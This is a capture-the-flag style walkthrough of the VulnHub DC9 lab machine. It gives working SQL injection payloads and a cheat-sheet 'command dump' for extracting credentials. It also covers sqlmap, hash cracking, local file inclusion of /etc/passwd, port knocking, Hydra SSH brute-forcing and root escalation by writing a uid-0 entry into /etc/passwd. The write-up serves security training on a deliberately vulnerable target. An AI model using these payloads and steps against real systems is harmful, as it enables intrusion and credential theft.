# DC9 ~ VulnHub

* * *

### Prerequisite

![DC9 ~ VulnHub](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985458372/e4ec2fe8-a830-4539-8ba7-5312d8b18854.jpeg)

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

    echo "192.168.72.131	dc9.hub" >> /etc/hosts

hosts file entry

![DC9 ~ VulnHub](/content/images/2021/02/image-229.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

     nmap -Pn -sC -sV -oN initial dc9.hub

    ┌──(root💀nee)-[~/boxes/vulnhub/dc9]
    └─# nmap -Pn -sV -sC -oN initial dc9.hub 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 01:35 EST
    Nmap scan report for dc9.hub (192.168.72.131)
    Host is up (0.000094s latency).
    Not shown: 998 closed ports
    PORT   STATE    SERVICE VERSION
    22/tcp filtered ssh
    80/tcp open     http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Example.com - Staff Details - Welcome
    MAC Address: 00:0C:29:2F:5A:5F (VMware)

### Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

![DC9 ~ VulnHub](/content/images/2021/02/image-230.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-231.png)

I realized that there was a display all records and a search page which utilized some sort of database.

![DC9 ~ VulnHub](/content/images/2021/02/image-232.png)

I went ahead tried to sql inject into the site's backend DB using the search field.

### Exploitation (Method 1)

The first step I took was to check if the search parameter was vulnerable by entering `' OR '1'='1'#` as the query.

![DC9 ~ VulnHub](/content/images/2021/02/image-262.png)

The site printed out all the entries in the database which confirmed that this field was vulnerable. The next order of business was to check how many columns returned by the backend on each query (Blind Injection) so that I would be able to execute a Union Select query to dump the database. For this, I entered the following as the search term and gradually increased the number.

    ' OR '1'='1' ORDER BY 1#
    ' OR '1'='1' ORDER BY 2#
    ' OR '1'='1' ORDER BY 3#
    ' OR '1'='1' ORDER BY 4#
    ' OR '1'='1' ORDER BY 5#
    ' OR '1'='1' ORDER BY 6#

When I tried `' OR '1'='1' ORDER BY 7#` , nothing was returned. This was what confirmed that the backed was returning 6 columns to us.

Next, I proceeded to construct the union select payload which I could leverage to get data out of the DB.

    nee was here' and 1=1 union select 1,2,3,4,5,6#

I knew this was working properly as I stopped getting the annoying `0 results` error message.

![DC9 ~ VulnHub](/content/images/2021/02/image-263.png)

Instead, I literally got back the numbers that I entered in the respective names. I also noticed something here. The name section printed out both values 2 and 3. I assumed that it was First and Last name from the database.

Next step was to get details regarding the backend database. I decided to abuse the SQL native functions for this. [Here](https://www.w3schools.com/sql/sql_ref_mysql.asp) are a bunch of SQL functions that I could have used. The following was my payload to dumb DB details:

    nee was here' and 1=1 union select database(),version(),3,user(),5,6 from information_schema.tables where table_schema = database()#

> Database: Staff

![DC9 ~ VulnHub](/content/images/2021/02/image-264.png)

I then got all the existing table names in the DB with the following payload:

    nee was here' and 1=1 union select table_name,version(),3,user(),5,6 from information_schema.tables where table_schema = database()#

> Database: Staff  
> Table 1: StaffDetails  
> Table 2: Users

![DC9 ~ VulnHub](/content/images/2021/02/image-265.png)

I got all the column names in the table with the following payload:

    nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#
    
    nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#

> Database: Staff  
> Table: Users

![DC9 ~ VulnHub](/content/images/2021/02/image-266.png)

> Database: Staff  
> Table: StaffDetails

![DC9 ~ VulnHub](/content/images/2021/02/image-267.png)

Followed by that, I attempted to dump out all the data from these tables with the following payloads:

    nee was here' and 1=1 union select userID,Username,"",Password,"","" from Users#
    
    nee was here' and 1=1 union select id,firstname,lastname,position,phone,email from StaffDetails#

> Database: Staff  
> Table: Users

![DC9 ~ VulnHub](/content/images/2021/02/image-268.png)

    admin:856f5de590ef37314e7c3bdf6f8a66dc

> Database: Staff  
> Table: StaffDetails

![DC9 ~ VulnHub](/content/images/2021/02/image-269.png)

At this point is when I realized that there might me another Schema in this database which I might not have checked. I used the following payload to do so:

    nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#

![DC9 ~ VulnHub](/content/images/2021/02/image-270.png)

This revealed that there was another schema in the DB named `users`. I ran the following query to list the tables in that schema:

    nee was here' and 1=1 union select table_name,"","","","","" from information_schema.tables where table_schema = 'users'#

![DC9 ~ VulnHub](/content/images/2021/02/image-271.png)

Turns out that the schema only had one table. I ran the following query to list the columns in the table:

    nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = 'users' and table_name ='UserDetails'#

![DC9 ~ VulnHub](/content/images/2021/02/image-272.png)

I was only interested in the usernames and passwords. Thus, I used the following query to dump them out:

    nee was here' and 1=1 union select group_concat(username,":",password),"","","","","" from users.UserDetails#
    
    --I used the group_concat() function to dump the usernames and passwords out on the same line--

![DC9 ~ VulnHub](/content/images/2021/02/image-273.png)

I then used [this](https://www.dcode.fr/values-separation) tool online to separate the values by the `,`.

**Raw**

    marym:3kfs86sfd,julied:468sfdfsd2,fredf:4sfd87sfd1,barneyr:RocksOff,tomc:TC&TheBoyz,jerrym:B8m#48sd,wilmaf:Pebbles,bettyr:BamBam01,chandlerb:UrAG0D!,joeyt:Passw0rd,rachelg:yN72#dsd,rossg:ILoveRachel,monicag:3248dsds7s,phoebeb:smellycats,scoots:YR3BVxxxw87,janitor:Ilovepeepee,janitor2:Hawaii-Five-0

**Processed**

    marym:3kfs86sfd
    julied:468sfdfsd2
    fredf:4sfd87sfd1
    barneyr:RocksOff
    tomc:TC&TheBoyz
    jerrym:B8m#48sd
    wilmaf:Pebbles
    bettyr:BamBam01
    chandlerb:UrAG0D!
    joeyt:Passw0rd
    rachelg:yN72#dsd
    rossg:ILoveRachel
    monicag:3248dsds7s
    phoebeb:smellycats
    scoots:YR3BVxxxw87
    janitor:Ilovepeepee
    janitor2:Hawaii-Five-0

### Command Dump

    list all schemas in DB=		nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#
    list current DB=	nee was here' and 1=1 union select database(),version(),3,user(),5,6 from information_schema.tables where table_schema = database()#
    
    list tables in current DB=	nee was here' and 1=1 union select table_name,version(),3,user(),5,6 from information_schema.tables where table_schema = database()#
    
    
    
    column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#
    column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#
    
    
    column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#
    dump data=			nee was here' and 1=1 union select userID,Username,"",Password,"","" from Users#
    
    column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#
    dump data=			nee was here' and 1=1 union select id,firstname,lastname,position,phone,email from StaffDetails#
    
    
    
    list all schemas in DB=		nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#
    table names in DB=		nee was here' and 1=1 union select table_name,"","","","","" from information_schema.tables where table_schema = 'users'#
    column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = 'users' and table_name ='UserDetails'#
    dump data=			nee was here' and 1=1 union select group_concat(username,":",password),"","","","","" from users.UserDetails#

### Exploitation (Method 2)

The first step I took was to intercept and save the search query request using burp suite.

![DC9 ~ VulnHub](/content/images/2021/02/image-233.png)

I then ran sqlmap with the request I captured.

    sqlmap -r search.req -dbs
    
    dbs= list all databases in target sql server

![DC9 ~ VulnHub](/content/images/2021/02/image-234.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-235.png)

This revealed that the `search` parameter was vulnerable. Sqlmap then proceeded to list databases on target by abusing the vulnerable parameter.

![DC9 ~ VulnHub](/content/images/2021/02/image-236.png)

I then proceeded to modify the commands to dump the database in order to retrieve information.

> Database: users  
> Table: UserDetails

![DC9 ~ VulnHub](/content/images/2021/02/image-237.png)

> Database: Staff  
> Table: Users

![DC9 ~ VulnHub](/content/images/2021/02/image-238.png)

> Database: Staff  
> Table: StaffDetails

![DC9 ~ VulnHub](/content/images/2021/02/image-241.png)

### Exploitation (Continued)

The first thing that stood out to me was the admin credentials.

    admin:856f5de590ef37314e7c3bdf6f8a66dc

It looked like an MD5 hash to me. Thus, I got to cracking it~ 😈

![DC9 ~ VulnHub](/content/images/2021/02/image-242.png)

    .\hashcat.exe -m 0 <hash.file> <list.file> -O --force

Using hashcat, I was able to crack the hash within a second which revealed the password.

    admin:transorbital1

![DC9 ~ VulnHub](/content/images/2021/02/image-243.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-244.png)

Once I was logged in as admin, I realized that there was a prompt saying `File does not exist`. I tried to climb the directory and read other files on the machine using the `file` parameter.

![DC9 ~ VulnHub](/content/images/2021/02/image-245.png)

I was successfully able to exploit a Local File Inclusion vulnerability and read `/etc/passwd`. I kept this in view as there was nothing valuable I could do with this vulnerability. **(YET)**

There was a list of usernames and passwords which I uncovered from the initial foothold (SQL Injection). I wanted to brute force these credentials for SSH access to the machine as I knew that SSH was open from the NMAP scan.

![DC9 ~ VulnHub](/content/images/2021/02/image-246.png)

However, I kept getting this `connection refused` reply when I tried to connect to the machine VIA port 22.After some poking around on the net, I found that there was this thing called `port knocking`

> In computing, port knocking is a method used to open ports on a firewall by a set of connection attempts launched over closed ports. The port will remain closed until a user attempts to initialize TCP and UDP connections to certain ports in a particular order. [Read More](https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu)!

After some more digging, I realized that the ports to knock could be found in the `knockd.conf` file located in the `/etc/` directory. This is when I utilized the LFI vulnerability.

![DC9 ~ VulnHub](/content/images/2021/02/image-247.png)

This file revealed that ports `7469,8475 and 9842` had to be knocked in that order to **open SSH** and ports `9842,8475 and 7469` had to be knocked in that order to **close SSH**. Thus I proceeded to knock those ports. I had the option to either do it with bash & NMAP or knock itself.

### Bash/NMAP

    for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x dc9.hub; done

![DC9 ~ VulnHub](/content/images/2021/02/image-248.png)

### Knock

    knock dc9.hub 7469 8475 9842

![DC9 ~ VulnHub](/content/images/2021/02/image-249.png)

As seen above, both methods allow us to connect to the target machine via SSH. Now I was ready to bruteforce my way in with Hydra. I first created 2 files with usernames and passwords respectively from the injection attack.

    hydra -L username -P password dc9.hub -T 4 ssh -I

![DC9 ~ VulnHub](/content/images/2021/02/image-250.png)

    chandlerb:UrAG0D!
    joeyt:Passw0rd
    janitor:Ilovepeepee

These were the accounts that I uncovered from the password spraying attack.

### Lateral Movement

![DC9 ~ VulnHub](/content/images/2021/02/image-251.png)

Out of all the accounts, only the account `janitor` had things of interest. There was a hidden file in the home directory which had what seemed like more passwords that I could spray with hydra.

![DC9 ~ VulnHub](/content/images/2021/02/image-252.png)

I went back to bruteforcing after I uncovered these passwords.

    hydra -L username -P morepasswords dc9.hub -t 4 ssh -I

![DC9 ~ VulnHub](/content/images/2021/02/image-253.png)

    fredf:B4-Tru3-001

Looking back at the Staff Details website, I realized Fred Flintstone was also the System Administrator of the company.

![DC9 ~ VulnHub](/content/images/2021/02/image-254.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-255.png)

### Privilege Escalation

The privilege escalation on this last user was pretty straight forward. The user `fredf` was allowed to run a python script which seemed to read contents from a file and append it to another.

![DC9 ~ VulnHub](/content/images/2021/02/image-256.png)

I first tried to copy my machine's public ssh key into root's `authorized_keys` file.

![DC9 ~ VulnHub](/content/images/2021/02/image-257.png)

However, There was no such file in root's directory. Thus, I decided to create another entry in the `/etc/passwd` file similar to root's entry but changing the username and password hash. I first worked on the password hash.

     openssl passwd -1 -salt <user> <pass>

![DC9 ~ VulnHub](/content/images/2021/02/image-258.png)

    fredf@dc-9:~$ echo 'nee:$1$nee$Y.k72LnpATMZLyNUSzukV.:0:0:root:/root:/bin/bash' > nee4root
    fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test nee4root /etc/passwd
    

![DC9 ~ VulnHub](/content/images/2021/02/image-259.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-260.png)

![DC9 ~ VulnHub](/content/images/2021/02/image-261.png)

ROOTY!
